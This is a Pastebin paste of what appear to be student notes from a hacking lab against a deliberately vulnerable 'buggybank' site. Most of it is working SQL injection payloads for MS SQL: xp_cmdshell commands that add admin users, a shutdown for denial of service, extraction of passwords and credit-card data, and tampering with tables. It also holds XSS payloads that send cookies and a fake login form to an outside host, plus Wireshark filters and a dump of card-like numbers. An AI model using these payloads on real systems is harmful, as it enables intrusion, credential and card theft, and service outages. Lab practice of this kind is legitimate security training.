API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 23rd, 2018
179
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.22 KB | None | 0 0
raw download clone embed print report
  1. 1/1/08 ' exec master..xp_cmdshell “net user paul noddy /ADD”; --
  2. 1/1/08 ' exec master..xp_cmdshell “net localgroup administrators paul /ADD”; --
  3. 1/1/08 ' exec master..xp_cmdshell "I am really bad at this > c:\sam.txt" -- '
  4. 1/1/08 ' exec master..xp_cmdshell "type c:\sam.txt" --
  5.  
  6. ' union select null," code", " expirydate", " cardnumber", "cardname" from creditcard order by 4--
  7. ' exec master..xp_cmdshell "net localgroup administrators Robot /ADD"; --
  8. ' exec master..xp_cmdshell "type readme.txt"; --
  9. ' exec master..xp_cmdshell "dir C:\inetpub\wwwroot\buggybank\ > sam3.txt"; --
  10. ' exec master..xp_cmdshell "type RobotPoop.txt"; --
  11. \domains\buggybank.cave\wwwroot\
  12. ' exec master..xp_cmdshell "Copy sam3.txt C:\inetpub\wwwroot\buggybank\sam3.txt*"; --
  13. ' exec master..xp_cmdshell "Copy C:\inetpub\wwwroot\buggybank\xfer.asp C:\inetpub\wwwroot\buggybank\robotpoop3.txt*"; --
  14.  
  15. Denial of Service
  16.  
  17. 1/1/08 ' shutdown with nowait; --
  18.  
  19. At the login prompt - data loss ...
  20. x ' or 1=1--
  21. 1 ' or 1=convert (int,(select top 1 cardname from creditcard))--
  22. 1 ' or 1=convert (int,(@@version))--
  23.  
  24. at the url input line..
  25. http://cave.buggybank.org/login.asp?username=' or 1=1--&account=9999
  26. http://cave.buggybank.org/login.asp?username=' having 1=1--&account=9999
  27.  
  28.  
  29. error based blind sql injection
  30. ' or 1=1--
  31. ' having 1=1--
  32. ' group by userinfo.username having 1=1--
  33. ' group by userinfo.username,userinfo.password having 1=1--
  34.  
  35. 1'; insert into userinfo values('noddy1','noddy1')--
  36. 1'; update userinfo set password='noddy1'--
  37. 1'; delete from userinfo where usermame='noddy1'--
  38.  
  39. o' or username like 'st%'--
  40. o' or username like 'd%'-- (then de, dem, demo)
  41.  
  42. 1' or 1 = convert(int,@@version)--
  43. 1' or 1 = convert(int,@@servername)--
  44. 1' or 1 = convert(int,(db_name()))--
  45. 1' or 1 = convert(int,(user_name()))--
  46.  
  47. 1' or 1=convert(int,(select top 1 password from userinfo))--
  48. 1' or 1=convert(int,(select top 1 username from userinfo where username not in ('me')))--
  49. 1' or 1=convert(int,(select password from userinfo where username=('me')))--
  50. 1' or 1=convert(int,(select top 1 cardnumber from creditcard))--
  51. 1' or 1=convert(int,(select top 1 cardname from creditcard))--
  52.  
  53. 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables))-- ...then
  54. 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables where
  55. table_name not in ('REFERENTIAL_CONSTRAINTS','CreditCard','dtproperties','sysalternates','sysconstraints')))--
  56.  
  57. 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables))--
  58. 1' or 1=convert(int,(select top 1 table_name from buggybank.information_schema.tables where
  59. table_name not in ('REFERENTIAL_CONSTRAINTS','%20hidden','dtproperties','sysalternates','sysconstraints')))--
  60.  
  61. ' union select null, null, null, null, column_name from information_schema.columns where table_name = '%20hidden' --
  62. ' union select null, null, null, null, name from sysCOLUMNS --
  63. ' union select null from userinfo--
  64. ' union select null, " Code", " ExpiryDate", " CardNumber", "Cardname" from creditcard order by 5--
  65. ' union select null, null, null, null, column_name from information_schema.columns where table_name = 'creditcard' --
  66. ' union select null, null, null, null, count (*) from userinfo order by 5 --
  67. ' union select null, table_name, table_type, null, null from information_schema.tables --
  68. ' union select null,null,null,null, password from userinfo--
  69. ' union select null,null,null,null, username from userinfo--
  70. ' union select null,null,null,username, password from userinfo--
  71.  
  72. Cross site script attacks
  73.  
  74. <script>alert("VULNERABLE");</script>
  75.  
  76. <script>document.location="http:\\www.malwarebytes.com";</script>
  77.  
  78. <script>alert(document.cookie);</script>
  79.  
  80. <a href=#onclick="document.location='http://www.malwarebytes.com?cookie='+escape(document.cookie)">click for free money</a>
  81.  
  82. <iframe src="http://www.malwarebytes.com height="0" width="0"></iframe>
  83.  
  84. Student is to research adding a form to a page - the solution is below...
  85.  
  86. <script>window.onload=function(){document.getElementByID('hakcme').innerHTML ='<p>Please enter your buggybank username & password to login as admin</p><form method="get" action="http://www.malwarebytes.com">Username:<input type="text" name="username"/><br/>Password:<input type="password" name="passwors"/><br/><p><input type="submit" value="Login"/><p/></form>';};</script>
  87.  
  88.  
  89. Wireshark filters
  90.  
  91. Display
  92. ip.src==10.5.11.1
  93. ip.src!=10.5.11.1
  94. ip.dst==
  95. http&&ip.src==
  96. tcp.port eq 80
  97. tcp contains 01:01:04
  98. snmp||dns||icmp
  99. ip.addr==
  100. decnet
  101. lat
  102.  
  103. capture filters
  104. tcp dst port #
  105. ip src host #
  106. src port range #-#
  107. not icmp
  108. src host # and not dst net #/16
  109. ether proto \icmp
  110. no broadcast
  111.  
  112. The Antikythera mechanism: The worlds oldest computer !
  113.  
  114. 1' or 1=convert(int,(select top 1 username from userinfo where username not in ('darren1','buggyboy','joker','demo','a','valus','alex','tony','me')))--
  115.  
  116. ' union select null, " Code", " ExpiryDate", " CardNumber", "Cardname" from creditcard order by 5--
  117.  
  118. 1125 4/8/2009 5108136656984175 Darren
  119. 1212 6/6/2014 43212255682521 Darren
  120. 1252 1/3/2014 43226587025400 Darren
  121. 1564 12/16/2009 6011002966567565 Darren
  122. 1568 9/9/2010 34565489474498 Darren
  123. 1657 12/4/2009 372407135137716 Darren
  124. 2364 9/8/2016 43556997816587 Darren
  125. 3456 12/12/2008 4800124627272269 Darren
  126. 3654 9/14/2013 34567789911235 Darren
  127. 4452 5/7/2009 5108132733652677 Darren
  128. 4468 8/18/2016 43221155547782 Darren
  129. 4486 5/5/2009 4673817253379452 Darren
  130. 4564 6/14/2012 43551126878954 Darren
  131. 4695 7/18/2014 34568897554889 Darren
  132. 5448 4/18/2011 43215484568798 Darren
  133. 5448 5/17/2011 43115877795246 Darren
  134. 5644 7/6/2011 34567874466884 Darren
  135. 5648 9/18/2010 6011008517179267 Darren
  136. 6411 3/4/2014 43659996571009 Darren
  137. 6486 7/6/2014 34569987554422 Darren
  138. 6878 9/19/2014 43556887774411 Darren
  139. 7655 2/2/2015 34561125548282 Darren
  140. 7897 8/17/2011 34561158889842 Darren
  141. 7952 5/24/2014 34567789428856 Darren
  142. 8410 9/28/2016 43221598735987 Darren
  143. 8871 4/18/2014 43698774563125 Darren
  144. 9028 4/4/2015 34566332158778 Darren
  145. 9542 4/8/2009 372861489856783 Darren
  146. 9544 3/22/2014 34567165484519 Darren
  147. 9878 4/18/2012 43556987458899 Darren
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!